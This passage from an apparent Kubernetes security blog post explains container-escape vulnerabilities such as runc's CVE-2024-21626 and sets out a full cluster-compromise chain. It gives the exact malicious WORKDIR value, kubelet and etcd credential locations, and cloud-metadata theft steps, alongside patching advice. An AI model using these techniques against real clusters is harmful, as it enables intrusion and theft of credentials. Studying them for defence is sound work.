The exploit: set the container’s working directory (WORKDIR) to /proc/self/fd/7/../../ – the leaked fd resolving to the host filesystem. When runc calls chdir() to set the working directory, it lands on the host filesystem instead of the container’s.

sequenceDiagram
    participant R as runc
    participant I as runc init
    participant C as Container Process
    participant H as Host Filesystem

    R->>R: open(/sys/fs/cgroup) -> fd 7
    Note over R: fd 7 NOT marked O_CLOEXEC
    R->>I: fork()
    Note over I: fd 7 inherited
    I->>I: chdir("/proc/self/fd/7/../../")
    Note over I: Resolves through leaked fd<br/>to HOST root filesystem
    I->>C: execve(entrypoint)
    Note over C: CWD is now on<br/>the HOST filesystem
    C->>H: Read/write arbitrary files

Affected versions: runc 1.0.0-rc93 through 1.1.11. Fixed in runc 1.1.12. At the time of disclosure, Wiz reported 80% of cloud environments were running vulnerable runc versions. A malicious container image with WORKDIR /proc/self/fd/7/../../ could escape on any unpatched host – no privileges needed, no misconfigurations required.

CVE-2024-21626 was part of a family of four “Leaky Vessels” CVEs. The BuildKit variants were even worse: CVE-2024-23652 (CVSS 9.1) allowed arbitrary file deletion on the host during image builds via symlink substitution.

2025 brought more:

CVE-2025-1974IngressNightmare (CVSS 9.8). Unauthenticated remote code execution through the ingress-nginx admission controller. Wiz found 43% of cloud environments vulnerable, with over 6,500 clusters exposing the admission controller to the internet. No authentication, no pod compromise needed – just send a crafted request to the admission webhook endpoint and you’re executing code inside the ingress controller’s pod, which typically has access to all cluster secrets.

CVE-2025-31133, CVE-2025-52565, CVE-2025-52881 – three new runc container escape vulnerabilities disclosed November 2025 by a SUSE researcher. Race conditions in mount handling and /dev/console bind mounts allowing container breakout. Fixed in runc 1.2.8, 1.3.3, and 1.4.0-rc.3.

CVE-2025-23266NVIDIAScape (CVSS 9.0). Container escape via the NVIDIA Container Toolkit using LD_PRELOAD manipulation. Exploitable with a three-line Dockerfile. Wiz found 37% of cloud environments running the vulnerable toolkit.

1
2
3
4
5
6
7
8
9
10
# Check what container runtime and kernel you're on
uname -r
# Output: 5.15.0-1052-aws

cat /proc/version
# Output: Linux version 5.15.0-1052-aws (buildd@...) (gcc ...)

# Check for known vulnerable runc version (from the host or node access)
runc --version
# Output: runc version 1.1.11 <-- vulnerable to CVE-2024-21626

The pattern is clear: the kernel is shared, the runtimes have bugs, and every node runs the same code. A kernel exploit from one pod compromises the node. From the node, you have the kubelet’s credentials at /var/lib/kubelet/kubeconfig. From the kubelet’s identity, you reach the API server. From the API server, you reach every other node in the cluster. One CVE. One pod. Full cluster compromise. No misconfigurations required.

Defensive notes: Keep runc, containerd, and kernel versions patched. Subscribe to kubernetes-security-announce. Use a supported container runtime with automatic updates. Run nodes with the minimum kernel capabilities needed. Consider gVisor or Kata Containers for high-risk workloads – they provide a separate kernel boundary that breaks this escalation chain entirely.


The Attack Chain

Every technique in this post is a link in the same chain. Here’s how they combine in a real-world engagement:

flowchart TD
    A["1. Initial Pod Compromise\n(app vuln, supply chain, exposed service)"] --> B["2. Read Service Account Token\n/var/run/secrets/.../token"]
    B --> C["3. Enumerate RBAC Permissions\nkubectl auth can-i --list"]
    C -->|"overprivileged SA"| D["4a. Create Privileged Pod\nor Exec into Other Pods"]
    C -->|"limited SA"| E["4b. Pivot via Kubelet API\ncurl :10250/run/..."]
    D --> F["5. Escape to Node\nnsenter / mount host disk"]
    E --> F
    F --> G["6. Steal Node Credentials\nkubelet kubeconfig, etcd certs"]
    G --> H["7. Access API Server or etcd\nRead all secrets, modify RBAC"]
    H --> I["8. Query Cloud Metadata API\nSteal IAM credentials"]
    I --> J["9. Full Cloud Account Compromise"]

The entry point varies. The destination doesn’t.


References

This post is licensed under CC BY 4.0 by the author.